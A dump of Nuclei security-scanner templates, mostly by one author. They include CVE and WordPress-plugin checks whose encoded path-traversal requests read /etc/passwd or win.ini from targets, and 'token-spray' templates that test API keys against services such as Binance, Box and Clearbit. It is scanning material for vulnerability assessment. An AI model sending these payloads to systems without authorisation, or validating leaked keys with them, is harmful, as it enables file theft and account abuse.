"root:.*:0:0:" 28 | part: body 29 | - type: status 30 | status: 31 | - 200 32 | 33 | # Enhanced by mp on 2022/04/20 34 | -------------------------------------------------------------------------------- /CVE-2018-16288.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-16288 2 | 3 | info: 4 | name: LG SuperSign EZ CMS 2.5 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs. 8 | reference: 9 | - https://www.exploit-db.com/exploits/45440 10 | - https://www.cvedetails.com/cve/CVE-2018-16288 11 | - http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html 12 | - https://www.exploit-db.com/exploits/45440/ 13 | classification: 14 | cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N 15 | cvss-score: 8.6 16 | cve-id: CVE-2018-16288 17 | cwe-id: CWE-200 18 | tags: cve,cve2018,lfi 19 | 20 | requests: 21 | - method: GET 22 | path: 23 | - "{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd" 24 | 25 | matchers-condition: and 26 | matchers: 27 | 28 | - type: regex 29 | regex: 30 | - "root:.*:0:0:" 31 | 32 | - type: status 33 | status: 34 | - 200 35 | -------------------------------------------------------------------------------- /CVE-2018-19458.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-19458 2 | 3 | info: 4 | name: PHP Proxy 3.0.3 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246. 8 | reference: 9 | - https://www.exploit-db.com/exploits/45780 10 | - https://www.cvedetails.com/cve/CVE-2018-19458 11 | - https://www.exploit-db.com/exploits/45780/ 12 | - https://pentest.com.tr/exploits/PHP-Proxy-3-0-3-Local-File-Inclusion.html 13 | classification: 14 | cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 15 | cvss-score: 7.5 16 | cve-id: CVE-2018-19458 17 | cwe-id: CWE-287 18 | tags: cve,cve2018,lfi,proxy 19 | 20 | requests: 21 | - method: GET 22 | path: 23 | - "{{BaseURL}}/index.php?q=file:///etc/passwd" 24 | 25 | matchers-condition: and 26 | matchers: 27 | 28 | - type: regex 29 | regex: 30 | - "root:.*:0:0:" 31 | 32 | - type: status 33 | status: 34 | - 200 35 | -------------------------------------------------------------------------------- /CVE-2019-20085.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-20085 2 | 3 | info: 4 | name: TVT NVMS 1000 - Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: TVT NVMS-1000 devices allow GET /.. Directory Traversal 8 | reference: 9 | - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 10 | - https://www.exploit-db.com/exploits/48311 11 | - https://www.exploit-db.com/exploits/47774 12 | - http://packetstormsecurity.com/files/157196/TVT-NVMS-1000-Directory-Traversal.html 13 | classification: 14 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 15 | cvss-score: 7.5 16 | cve-id: CVE-2019-20085 17 | cwe-id: CWE-22 18 | tags: cve,cve2019,iot,lfi,cisa 19 | 20 | requests: 21 | - method: GET 22 | path: 23 | - "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini" 24 | 25 | matchers-condition: and 26 | matchers: 27 | - type: regex 28 | regex: 29 | - "\\[(font|extension|file)s\\]" 30 | part: body 31 | - type: status 32 | status: 33 | - 200 34 | -------------------------------------------------------------------------------- /CVE-2020-35598.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-35598 2 | 3 | info: 4 | name: Advanced Comment System 1.0 - Path Traversal 5 | author: daffainfo 6 | severity: high 7 | description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI. 8 | reference: 9 | - https://www.exploit-db.com/exploits/49343 10 | - https://www.cvedetails.com/cve/CVE-2020-35598 11 | - https://seclists.org/fulldisclosure/2020/Dec/13 12 | classification: 13 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 14 | cvss-score: 7.5 15 | cve-id: CVE-2020-35598 16 | cwe-id: CWE-22 17 | tags: cve,cve2020,lfi 18 | 19 | requests: 20 | - method: GET 21 | path: 22 | - "{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00" 23 | 24 | matchers-condition: and 25 | matchers: 26 | 27 | - type: regex 28 | regex: 29 | - "root:.*:0:0:" 30 | 31 | - type: status 32 | status: 33 | - 200 34 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # my-nuclei-templates 2 | Some contributions in the nuclei-templates repository 3 | -------------------------------------------------------------------------------- /acrolinx-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: acrolinx-workflow 2 | 3 | info: 4 | name: Acrolinx Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Acrolinx related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/acrolinx-dashboard.yaml 10 | subtemplates: 11 | - tags: acrolinx 12 | -------------------------------------------------------------------------------- /activemq-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: activemq-workflow 2 | 3 | info: 4 | name: ActiveMQ Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all ActiveMQ related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/activemq-panel.yaml 10 | subtemplates: 11 | - tags: activemq 12 | -------------------------------------------------------------------------------- /admin-word-count-column-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: admin-word-count-column-lfi 2 | 3 | info: 4 | name: Admin word count column 2.2 - Arbitrary File Retrieval 5 | author: daffainfo,Splint3r7 6 | severity: high 7 | reference: 8 | - https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html 9 | - https://wordpress.org/plugins/admin-word-count-column/ 10 | tags: wordpress,wp-plugin,lfi,wp 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0' 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: regex 20 | regex: 21 | - "root:[x*]:0:0" 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /adminer-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: adminer-workflow 2 | 3 | info: 4 | name: Adminer Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Adminer related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/adminer-panel.yaml 10 | subtemplates: 11 | - tags: adminer -------------------------------------------------------------------------------- /ambari-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: ambari-workflow 2 | 3 | info: 4 | name: Ambari Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Ambari related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/ambari-exposure.yaml 10 | subtemplates: 11 | - tags: ambari 12 | -------------------------------------------------------------------------------- /amministrazione-aperta-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: amministrazione-aperta-lfi 2 | 3 | info: 4 | name: Amministrazione Aperta 3.7.3 - Unauthenticated Local File Read 5 | author: daffainfo,Splint3r7 6 | severity: high 7 | reference: 8 | - https://www.exploit-db.com/exploits/50838 9 | - https://wordpress.org/plugins/amministrazione-aperta 10 | tags: wordpress,wp-plugin,lfi,wp 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - '{{BaseURL}}/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd' 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: regex 20 | regex: 21 | - "root:[x*]:0:0" 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /apereo-cas-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: apereo-cas-workflow 2 | 3 | info: 4 | name: Apereo CAS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Apereo CAS related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/cas-login.yaml 10 | subtemplates: 11 | - tags: cas 12 | -------------------------------------------------------------------------------- /api-1forge.yaml: -------------------------------------------------------------------------------- 1 | id: api-1forge 2 | 3 | info: 4 | name: 1Forge API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://1forge.com/api 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Currency%20Exchange/1Forge.md 10 | tags: token-spray,1forge 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.1forge.com/quota?api_key={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"quota_used":' 23 | - '"quota_limit":' 24 | - '"quota_remaining":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-abstractapi.yaml: -------------------------------------------------------------------------------- 1 | id: api-abstractapi 2 | 3 | info: 4 | name: Abstract Api Public Holidays Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://www.abstractapi.com/holidays-api 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Abstract%20Public%20Holidays.md 10 | tags: token-spray,abstractapi 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://holidays.abstractapi.com/v1/?api_key={{token}}&country=GB&year=2021&month=1&day=25" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"name_local":' 23 | - '"location":' 24 | - '"date_year":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-abuseipdb.yaml: -------------------------------------------------------------------------------- 1 | id: api-abuseipdb 2 | 3 | info: 4 | name: AbuseIPDB API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.abuseipdb.com/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md 10 | tags: token-spray,abuseipdb 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | POST https://api.abuseipdb.com/api/v2/report HTTP/1.1 17 | Host: api.abuseipdb.com 18 | Key: {{token}} 19 | Accept: application/json 20 | Content-Type: application/x-www-form-urlencoded 21 | Content-Length: 16 22 | 23 | ip=127.0.0.1&categories=18,22&comment=SSH%20login%20attempts%20with%20user%20root. 24 | 25 | matchers: 26 | - type: word 27 | part: body 28 | words: 29 | - 'data":' 30 | - 'ipAddress":' 31 | condition: and 32 | -------------------------------------------------------------------------------- /api-adoptapet.yaml: -------------------------------------------------------------------------------- 1 | id: api-adoptapet 2 | 3 | info: 4 | name: AdoptAPet API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://www.adoptapet.com/public/apis/pet_list.html 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/AdoptAPet.md 10 | tags: token-spray,adoptapet 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.adoptapet.com/search/pets_at_shelter?key={{token}}&v=2&output=json&shelter_id=79570&start_number=1&end_number=500" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - 'returned_pets":' 23 | - 'total_pets":' 24 | condition: and 25 | -------------------------------------------------------------------------------- /api-alchemy.yaml: -------------------------------------------------------------------------------- 1 | id: api-alchemy 2 | 3 | info: 4 | name: Alchemy API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.alchemy.com/alchemy/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Alchemy.md 10 | tags: token-spray,alchemy 11 | 12 | self-contained: true 13 | requests: 14 | - method: POST 15 | path: 16 | - "https://eth-mainnet.alchemyapi.io/v2/{{token}}" 17 | body: '{"jsonrpc":"2.0","method":"eth_blockNumber","params":[],"id":0}' 18 | 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - '"id":' 24 | - '"result":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-alienvault.yaml: -------------------------------------------------------------------------------- 1 | id: api-alienvault 2 | 3 | info: 4 | name: AlienVault Open Threat Exchange (OTX) API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://otx.alienvault.com/api 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md 10 | tags: token-spray,alienvault,exchange 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1 17 | Host: otx.alienvault.com 18 | X-OTX-API-KEY: {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"$schema":' 25 | - '"properties":' 26 | condition: and 27 | -------------------------------------------------------------------------------- /api-amdoren.yaml: -------------------------------------------------------------------------------- 1 | id: api-amdoren 2 | 3 | info: 4 | name: Amdoren API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://www.amdoren.com/currency-api/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Currency%20Exchange/Amdoren.md 10 | tags: token-spray,amdoren 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://www.amdoren.com/api/currency.php?api_key={{token}}&from=USD&to=EUR" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"error" : 0' 23 | - '"error_message" : "-"' 24 | condition: and 25 | -------------------------------------------------------------------------------- /api-aniapi.yaml: -------------------------------------------------------------------------------- 1 | id: api-aniapi 2 | 3 | info: 4 | name: AniAPI API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://aniapi.com/docs/authentication 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Anime/AniAPI.md 10 | tags: token-spray,aniapi 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.aniapi.com/v1/auth/me" 17 | headers: 18 | Authorization: Bearer {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"username":' 25 | - '"data":' 26 | condition: and 27 | -------------------------------------------------------------------------------- /api-bhagavadgita.yaml: -------------------------------------------------------------------------------- 1 | id: api-bhagavadgita 2 | 3 | info: 4 | name: Bhagavad Gita API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.bhagavadgitaapi.in/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Books/Bhagavad%20Gita.md 10 | tags: token-spray,bhagavadgita 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://bhagavadgitaapi.in/slok?api_key={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"chapter"' 23 | - '"verse"' 24 | - '"slok"' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-bible.yaml: -------------------------------------------------------------------------------- 1 | id: api-bible 2 | 3 | info: 4 | name: API.Bible API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.api.bible 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Books/API%20Bible.md 10 | tags: token-spray,bible 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.scripture.api.bible/v1/bibles/a6aee10bb058511c-02/verses/JHN.3.16?fums-version=3" 17 | headers: 18 | api-key: "{{token}}" 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - "orgId" 25 | - "bookId" 26 | - "bibleId" 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-binance.yaml: -------------------------------------------------------------------------------- 1 | id: api-binance 2 | 3 | info: 4 | name: Binance REST API 5 | author: geeknik 6 | severity: info 7 | reference: 8 | - https://github.com/binance/binance-spot-api-docs/blob/master/rest-api.md 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Binance.md 10 | tags: token-spray,binance 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.binance.com/api/v3/historicalTrades" 17 | headers: 18 | X-MBX-APIKEY: "{{token}}" 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"id":' 25 | - '"price":' 26 | - '"quoteQty":' 27 | condition: and -------------------------------------------------------------------------------- /api-bitcoinaverage.yaml: -------------------------------------------------------------------------------- 1 | id: api-bitcoinaverage 2 | 3 | info: 4 | name: BitcoinAverage API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://apiv2.bitcoinaverage.com/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/BitcoinAverage.md 10 | tags: token-spray,bitcoinaverage 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://apiv2.bitcoinaverage.com/exchanges/ticker/bitstamp HTTP/1.1 17 | Host: apiv2.bitcoinaverage.com 18 | x-ba-key: {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"name"' 25 | - '"display_name"' 26 | - '"url"' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-bitquery.yaml: -------------------------------------------------------------------------------- 1 | id: api-bitquery 2 | 3 | info: 4 | name: Bitquery API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://graphql.bitquery.io/ide 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Bitquery.md 10 | tags: token-spray,bitquery 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | POST https://graphql.bitquery.io HTTP/1.1 17 | Host: graphql.bitquery.io 18 | X-API-KEY: {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"message": "No query string was present"' 25 | -------------------------------------------------------------------------------- /api-bitrise.yaml: -------------------------------------------------------------------------------- 1 | id: api-bitrise 2 | 3 | info: 4 | name: Bitrise API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://api-docs.bitrise.io/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Continous%20Integration/Bitrise.md 10 | tags: token-spray,bitrise 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://api.bitrise.io/v0.1/me HTTP/1.1 17 | Host: api.bitrise.io 18 | Authorization: {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"username":' 25 | - '"slug":' 26 | - '"email":' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-block.yaml: -------------------------------------------------------------------------------- 1 | id: api-block 2 | 3 | info: 4 | name: block.io API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://block.io/docs/basic 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Block.md 10 | tags: token-spray,block 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://block.io/api/v2/get_balance/?api_key={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"network"' 23 | - '"available_balance"' 24 | - '"pending_received_balance"' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-blockchain.yaml: -------------------------------------------------------------------------------- 1 | id: api-blockchain 2 | 3 | info: 4 | name: Blockchain API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://api.blockchain.com/v3/#/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Blockchain.md 10 | classification: 11 | cwe-id: CWE-200 12 | tags: token-spray,blockchain 13 | 14 | self-contained: true 15 | requests: 16 | - raw: 17 | - | 18 | GET https://api.blockchain.com/v3/exchange/accounts HTTP/1.1 19 | Host: api.blockchain.com 20 | X-API-Token: {{token}} 21 | 22 | matchers: 23 | - type: word 24 | part: body 25 | words: 26 | - '"currency"' 27 | - '"balance"' 28 | - '"available"' 29 | condition: and 30 | 31 | # Enhanced by cs on 2022/02/28 32 | -------------------------------------------------------------------------------- /api-blockfrost.yaml: -------------------------------------------------------------------------------- 1 | id: api-blockfrost 2 | 3 | info: 4 | name: Blockfrost API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.blockfrost.io/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Blockfrost.md 10 | tags: token-spray,blockfrost 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://cardano-mainnet.blockfrost.io/api/v0/ HTTP/1.1 17 | Host: cardano-mainnet.blockfrost.io 18 | project_id: {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"url":' 25 | - '"version":' 26 | condition: and 27 | -------------------------------------------------------------------------------- /api-box.yaml: -------------------------------------------------------------------------------- 1 | id: api-box 2 | 3 | info: 4 | name: Box API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://developer.box.com/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Box.md 10 | tags: token-spray,box 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://api.box.com/2.0/collections HTTP/1.1 17 | Host: api.box.com 18 | Authorization: Bearer {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - 'total_count":' 25 | - 'limit":' 26 | condition: and 27 | -------------------------------------------------------------------------------- /api-bravenewcoin.yaml: -------------------------------------------------------------------------------- 1 | id: api-bravenewcoin 2 | 3 | info: 4 | name: Brave New Coin API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://bravenewcoin.com/developers 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Brave%20New%20Coin.md 10 | tags: token-spray,bravenewcoin 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://bravenewcoin.p.rapidapi.com/market HTTP/1.1 17 | X-Rapidapi-Host: bravenewcoin.p.rapidapi.com 18 | X-Rapidapi-Key: {{token}} 19 | Host: bravenewcoin.p.rapidapi.com 20 | 21 | matchers: 22 | - type: word 23 | part: body 24 | words: 25 | - '"content":' 26 | - '"id":' 27 | - '"baseAssetId":' 28 | - '"quoteAssetId":' 29 | condition: and 30 | -------------------------------------------------------------------------------- /api-calendarific.yaml: -------------------------------------------------------------------------------- 1 | id: api-calendarific 2 | 3 | info: 4 | name: Calendarific API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://calendarific.com/api-documentation 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Calendarific.md 10 | tags: token-spray,calendarific 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://calendarific.com/api/v2/holidays?api_key={{token}}&country=US&year=2021" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"holidays"' 23 | - '"name"' 24 | - '"description"' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-charity.yaml: -------------------------------------------------------------------------------- 1 | id: api-charity 2 | 3 | info: 4 | name: Charity Search API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - http://charityapi.orghunter.com/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Charity%20Search.md 10 | tags: token-spray,charity,search 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "http://data.orghunter.com/v1/charitybasic?user_key={{token}}&ein=590774235" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: status 21 | status: 22 | - 200 23 | 24 | - type: word 25 | part: body 26 | words: 27 | - '"ein":' 28 | - '"name":' 29 | - '"inCareOfName"' 30 | condition: and 31 | -------------------------------------------------------------------------------- /api-clearbit.yaml: -------------------------------------------------------------------------------- 1 | id: api-clearbit 2 | 3 | info: 4 | name: Clearbit API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://clearbit.com/docs 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Clearbit.md 10 | tags: token-spray,clearbit 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://person.clearbit.com/v2/combined/find?email=alex@clearbit.com HTTP/1.1 17 | Authorization: Basic {{base64(token + ':')}} 18 | Host: person.clearbit.com 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"person":' 25 | - '"id":' 26 | - '"name":' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-coinapi.yaml: -------------------------------------------------------------------------------- 1 | id: api-coinapi 2 | 3 | info: 4 | name: CoinAPI API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.coinapi.io/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/CoinAPI.md 10 | tags: token-spray,coinapi 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://rest.coinapi.io/v1/exchanges HTTP/1.1 17 | Host: rest.coinapi.io 18 | X-CoinAPI-Key: {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"exchange_id":' 25 | - '"website":' 26 | - '"name":' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-coinlayer.yaml: -------------------------------------------------------------------------------- 1 | id: api-coinlayer 2 | 3 | info: 4 | name: Coinlayer API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://coinlayer.com/documentation 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Coinlayer.md 10 | tags: token-spray,coinlayer 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.coinlayer.com/live?access_key={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"success"' 23 | - '"terms"' 24 | - '"privacy"' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-coinmarketcap.yaml: -------------------------------------------------------------------------------- 1 | id: api-coinmarketcap 2 | 3 | info: 4 | name: CoinMarketCap API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://coinmarketcap.com/api/documentation/v1 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/CoinMarketCap.md 10 | tags: token-spray,coinmarketcap 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest HTTP/1.1 17 | Host: pro-api.coinmarketcap.com 18 | X-CMC_PRO_API_KEY: {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"name"' 25 | - '"symbol"' 26 | - '"cmc_rank"' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-coinranking.yaml: -------------------------------------------------------------------------------- 1 | id: api-coinranking 2 | 3 | info: 4 | name: Coinranking API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://developers.coinranking.com/api/documentation 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Coinranking.md 10 | tags: token-spray,coinranking 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://api.coinranking.com/v2/exchanges HTTP/1.1 17 | Host: api.coinranking.com 18 | x-access-token: {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"exchanges"' 25 | - '"coinrankingUrl"' 26 | - '"uuid"' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-cooperhewitt.yaml: -------------------------------------------------------------------------------- 1 | id: api-cooperhewitt 2 | 3 | info: 4 | name: Cooper Hewitt API 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://collection.cooperhewitt.org/api/methods/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Cooper%20Hewitt.md 10 | tags: token-spray,cooperhewitt 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"stat":' 23 | - '"formats":' 24 | - '"default_format":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-covalent.yaml: -------------------------------------------------------------------------------- 1 | id: api-covalent 2 | 3 | info: 4 | name: Covalent API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://www.covalenthq.com/docs/api/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Covalent.md 10 | tags: token-spray,covalent 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.covalenthq.com/v1/3/address/balances_v2/?&key={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"address":' 23 | - '"updated_at":' 24 | - '"next_update_at":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-ddownload.yaml: -------------------------------------------------------------------------------- 1 | id: api-ddownload 2 | 3 | info: 4 | name: ddownload API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://ddownload.com/api 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/ddownload.md 10 | tags: token-spray,ddownload 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api-v2.ddownload.com/api/account/info?key={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"storage_left"' 23 | - '"premium_traffic_left"' 24 | - '"email"' 25 | condition: and 